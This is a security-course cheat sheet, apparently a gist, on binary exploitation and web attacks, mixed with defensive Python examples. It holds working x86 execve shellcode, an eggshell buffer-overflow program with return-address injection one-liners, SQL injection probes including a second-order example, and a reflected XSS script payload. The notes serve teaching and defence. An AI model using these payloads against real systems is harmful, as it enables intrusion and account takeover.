- Dot-dot and directory traversal attacks
- Linking
- Binary to ASM
- [View strings in binary](#view-strings-in-binary)
- Checking system calls
- Debugging with GDB
- Shell code for /bin/sh from shell-storm
- Buffer overflow
- SQL Injection cheat sheet
- Making client side requests
- xinetd
## Dot-dot and directory traversal attacks

This is where noobs start. If you are not sure what this is, this guide might not make much sense to you.
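The defensive side of the dot-dot attack is a containment check before any file is opened. The following is an added example, not part of the original gist: a `safe_join` that normalises a user-supplied path under a web root and refuses anything that escapes it. `WEB_ROOT` and the sample requests are constructed for the demonstration; the check is purely lexical (no filesystem access), which is the layer at which `..` sequences operate.

```python
import posixpath
from urllib.parse import unquote

# Constructed example root for the demonstration; nothing is read from disk.
WEB_ROOT = "/var/www/files"


def safe_join(root, user_path):
    """Resolve user_path under root, refusing anything that escapes root.

    Returns the normalised absolute path, or None if the request is rejected.
    """
    # Decode percent-encoding twice: a server that decodes once and then
    # normalises can be fooled by a double-encoded dot-dot (%252e%252e).
    decoded = unquote(unquote(user_path))
    # NUL bytes and backslashes are only ever used to confuse path parsers.
    if "\x00" in decoded or "\\" in decoded:
        return None
    # A leading slash must not be allowed to make the path absolute.
    relative = decoded.lstrip("/")
    # normpath collapses "a/../b" to "b" and "./x" to "x" lexically.
    candidate = posixpath.normpath(posixpath.join(root, relative))
    root_norm = posixpath.normpath(root)
    # Containment: the result is root itself or strictly below it.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: two legitimate, four traversal attempts.
    for req in ["docs/report.pdf", "docs/../readme.txt",
                "../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
                "%252e%252e/etc/passwd", "..\\..\\boot.ini"]:
        print(f"{req!r:32} -> {safe_join(WEB_ROOT, req)}")
```

A `..` that stays inside the root (`docs/../readme.txt`) is accepted, because the check is on where the path ends up, not on the presence of dots.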
## Linking

Create a symbolic link (`-s`), overwriting an existing link at the destination (`-f`):

```sh
ln -sf /tmp/target /tmp/link
```
## Binary to ASM

Using objdump:

```sh
objdump -S binary.out | less
```

Pic - Adam Doupe
## View strings in binary

Using strings:

```sh
strings binary.out
# or
objdump -s binary.out | less
```
## Checking system calls

```sh
ltrace -f binary.out   # library calls (follow forked children with -f)
strace -f binary.out   # system calls
```
## Debugging with GDB

(tutorial)

```sh
gdb binary.out
(gdb) r                                 # run the program
(gdb) b <line_number/memory_address>    # set a breakpoint
(gdb) c                                 # continue
(gdb) attach <pid>                      # attach to an ongoing process
(gdb) set detach-on-fork off            # stay attached to a forked child
```
Ensuring that the same address works in debug mode and at runtime is extremely important. Use this utility to make sure that the environment and the argument stack remain the same in both modes.

- Invocation:

  ```sh
  $ invoke.sh binary.out      # just call the executable
  $ invoke.sh -d binary.out   # run the executable in GDB
  ```

- Utility `invoke.sh` (don't forget to `chmod +x invoke.sh`):

```sh
#!/bin/sh
# invoke.sh - run a binary with an emptied, reproducible environment,
# optionally under GDB, so that stack addresses match between both modes.
while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s [-d] [-t] [-e KEY=VALUE] prog [args...]\n" "$(basename "$0")"
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f "$1")
shift
# $env is deliberately unquoted: when no -e was given it must vanish
# rather than become an empty argument to env.
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    # -t: give the debuggee its own pty so its I/O stays out of GDB's terminal
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args "$prog" "$@"
  else
    exec env - $env TERM=screen PWD=$PWD gdb --args "$prog" "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD "$prog" "$@"
fi
```

Ref - stackoverflow
## Shell code for /bin/sh from shell-storm

Linux/x86 execve("/bin//sh") shellcode, 23 bytes:

```
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
```
## Buffer overflow

Create an "eggshell": place the shellcode (spawning /bin/sh) in a new environment variable, then start a shell that inherits it. (tutorial)

```c
/* eggcode.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"
"\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
int main(void)
{
    char shell[513];                 /* 512 bytes of payload + terminating NUL */
    puts("Eggshell loaded into environment.");
    memset(shell, NOP, 512);         /* fill the buffer with NOPs (the sled) */
    shell[512] = '\0';               /* setenv() needs a C string */
    /* copy the shellcode into the tail of the buffer, after the NOP sled */
    memcpy(&shell[512 - strlen(shellcode)], shellcode, strlen(shellcode));
    /* export it as EGG; overwrite an existing EGG if present */
    setenv("EGG", shell, 1);
    /* start a shell that inherits EGG */
    system("bash");
    return 0;
}
```

Gets the address of the first byte of the egg (the start of the NOP sled) as seen from a process started inside that shell:

```c
/* findeggaddr.c */
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
    char *egg = getenv("EGG");
    if (egg == NULL) {
        puts("EGG is not set; run eggcode first.");
        return 1;
    }
    printf("EGG address: %p\n", (void *)egg);
    return 0;
}
```
Exploit using the overflowed buffer: calculate the stack address and inject it with a Python 2 or Perl one-liner, e.g.:

```sh
python -c "print 'A'*516 + '\x73\xf5\xff\xbf'"
perl -e 'print "A"x516'; printf '\x73\xf5\xff\xbf'
```
Please keep in mind:

- Endianness (on little-endian x86 the address bytes are written in reverse order)
- Checking `env` after injecting the shell code
- Size of data types (char-1, int-4, float-8, double-16 etc.) when overflowing buffers; confirm with `sizeof` on the target, since sizes depend on the ABI

| Declaration | Allocation in memory |
|---|---|
| first | lower mem address |
| last | higher mem address |

Pic - Adam Doupe
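The endianness point above is the one beginners trip on most: GDB prints `0xbffff573`, but the bytes that must land in the overflow are `\x73\xf5\xff\xbf`. This added example (not from the original gist) packs and unpacks a 32-bit address in both byte orders with `struct`, and rebuilds the 516-byte padding plus address from the one-liners above so the two can be compared; the address value is the one already quoted on this page.

```python
import struct


def pack_addr(addr, byteorder="little"):
    """Return the 4-byte in-memory form of a 32-bit address.

    GDB shows the most significant byte first (0xbffff573), but a
    little-endian x86 process stores the least significant byte at the
    lowest address, so the bytes in the payload appear reversed.
    """
    fmt = "<I" if byteorder == "little" else ">I"
    return struct.pack(fmt, addr)


def unpack_addr(raw, byteorder="little"):
    """Inverse of pack_addr: read 4 raw bytes (e.g. from a memory dump) back
    into the integer GDB would print."""
    fmt = "<I" if byteorder == "little" else ">I"
    return struct.unpack(fmt, raw)[0]


def build_payload(padding, addr):
    """Padding followed by the little-endian address, as the one-liners do."""
    return b"A" * padding + pack_addr(addr)


if __name__ == "__main__":
    addr = 0xBFFFF573  # the address quoted on this page
    print("little-endian:", pack_addr(addr).hex())
    print("big-endian:   ", pack_addr(addr, "big").hex())
    print("round trip:   ", hex(unpack_addr(pack_addr(addr))))
    print("payload len:  ", len(build_payload(516, addr)))
```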
## SQL Injection cheat sheet

Checking for SQL injection:

- Normal:

  ```sql
  ' or 1=1 --
  ```

- Blind: both requests return the same response if a user with user_name h4x0r exists

  ```
  pressRelease.jsp?id=5
  pressRelease.jsp?id=5 AND user_name()='h4x0r'
  ```

- Second-order injection: register the user name `john'--`, then the real john's password gets changed when the application later runs:

  ```sql
  update users set password= … where username ='john'--'
  ```

Please ensure you see the cheat sheet for the correct technology. Here is the one for MySQL.
## Making client side requests

```sh
curl -H 'Header: value' <ip/hostname>:<port>
curl -b PHPSESSID=n7591kbbse8rug4dfn019skv05 -F oid=5929 -F price=2500 -F cur=usd http://192.168.84.167/code/purchase.php
nc <destination> <port> < input.txt   # send the file's contents to the service's stdin
```
## xinetd

- Service definition in /etc/xinetd.d:

  ```
  service <service_name>
  {
      socket_type = stream
      protocol    = tcp
      user        = <user_executing_this>
      wait        = no
      server      = /<path_to_binary>/<binary_with_x_permissions>
      log_type    = SYSLOG daemon debug
  }
  ```

- Add the service to /etc/services:

  ```
  <service_name> 11000/tcp
  ```

- Restart xinetd (only needed if the executable's name changes after a patch):

  ```sh
  sudo /etc/init.d/xinetd restart
  ```
Prevention:

- XSS prevention cheat-sheet
- SQL injection prevention cheat-sheet: specify the query structure first, then provide the parameters

  ```php
  $stmt = $db->prepare("select * from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1;");
  $stmt->bindParam(':name', $name);
  $stmt->bindParam(':pass', $pass);
  ```

- PHP, the worst framework's cheat-sheet
- Remote OS command execution: `escapeshellcmd($str)`
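To make the "Checking for SQL injection" items and the prepared-statement fix concrete side by side, here is an added example that is not part of the original gist. It uses an in-memory SQLite database with constructed rows (the `users` table, the user `john` and the password `correct horse` are made up for the demo) and shows the `' or 1=1 --` login bypass and the second-order `john'--` password change against string-built queries, and that the same inputs are inert once the query structure is fixed and the values are bound as parameters.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with one legitimate user."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (username text, password text)")
    db.execute("insert into users values ('john', 'correct horse')")
    db.commit()
    return db


def login_vulnerable(db, name, pw):
    """Query text built by concatenation: the injectable form."""
    sql = ("select username from users where username = '" + name
           + "' and password = '" + pw + "' limit 1")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, name, pw):
    """Structure fixed first, values bound as parameters (as in the PHP snippet)."""
    sql = "select username from users where username = ? and password = ? limit 1"
    row = db.execute(sql, (name, pw)).fetchone()
    return row[0] if row else None


def register(db, name, pw):
    """Registration is parameterised, so a name like john'-- is stored verbatim.
    That stored value is the payload for the second-order case below."""
    db.execute("insert into users values (?, ?)", (name, pw))
    db.commit()


def change_password_vulnerable(db, name, new_pw):
    """Trusts the username because it 'came from the database'."""
    sql = ("update users set password = '" + new_pw
           + "' where username = '" + name + "'")
    db.execute(sql)
    db.commit()


def change_password_safe(db, name, new_pw):
    """Same operation with bound parameters: the stored quote is just data."""
    db.execute("update users set password = ? where username = ?", (new_pw, name))
    db.commit()


def password_of(db, name):
    row = db.execute("select password from users where username = ?", (name,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 --"
    print("vulnerable login with bypass:", login_vulnerable(db, bypass, "x"))
    print("safe login with bypass:      ", login_safe(db, bypass, "x"))
    register(db, "john'--", "attacker-pw")
    change_password_vulnerable(db, "john'--", "owned")
    print("john's password after second-order update:", password_of(db, "john"))
```

In the vulnerable login the `--` comments out the rest of the statement, including `limit 1`, so the first row in the table is returned; in the second-order case the stored `john'--` closes the string early and comments out the trailing quote, so the `update` hits `john`. With parameters bound, both inputs are compared as literal strings and match nothing.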
XSS Attacks:

- Reflected XSS attack. Example:

  ```php
  <?php $name = $_GET['name']; ?>
  <html>
  <body>
  <p> Hello <?= $name ?></p>
  </body>
  </html>
  ```

  The attack works by sending untrusted data in the request that the page echoes back unescaped, like:

  ```
  http://example.com?name=<script>alert('attack')</script>
  ```
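The fix for the reflected case is to escape the parameter for the HTML-body context it is inserted into, with a Content-Security-Policy as a second line of defence. The following is an added example, not from the original gist; it mirrors the PHP page above in Python, extracts `name` from the URL quoted on this page, and renders it both unescaped and escaped so the difference can be compared. The `response_headers` values are an assumed baseline policy, not something the page specifies.

```python
import html
from urllib.parse import parse_qs, urlsplit


def name_from_url(url):
    """Extract the 'name' query parameter the way the server would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("name", [""])[0]


def render_hello_vulnerable(name):
    """Mirrors the PHP snippet above: the parameter is echoed verbatim."""
    return "<html><body><p> Hello " + name + "</p></body></html>"


def render_hello(name):
    """HTML-body context: &, <, >, \" and ' are escaped before interpolation,
    so browser-parsed markup in the input becomes visible text."""
    return "<html><body><p> Hello " + html.escape(name, quote=True) + "</p></body></html>"


def response_headers():
    """Assumed baseline headers: a CSP that refuses inline scripts even if an
    escaping call is missed somewhere else in the application."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }


def contains_script_tag(rendered):
    """Crude check used here only to show which rendering still carries markup."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    url = "http://example.com?name=<script>alert('attack')</script>"  # from the page
    name = name_from_url(url)
    print("vulnerable:", render_hello_vulnerable(name))
    print("escaped:   ", render_hello(name))
    print("headers:   ", response_headers())
```

Escaping is context-specific: `html.escape` is right for text between tags and for quoted attribute values, but a value placed inside a `<script>` block, a URL or a CSS rule needs the encoding of that context instead, which is what the XSS prevention cheat-sheet above enumerates.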
sailik1991 - There are a thousand ways to evade checks and execute XSS.
Here is a list of all Filter Evasion techniques.
This is useful.
At present, add your updates to the comment section.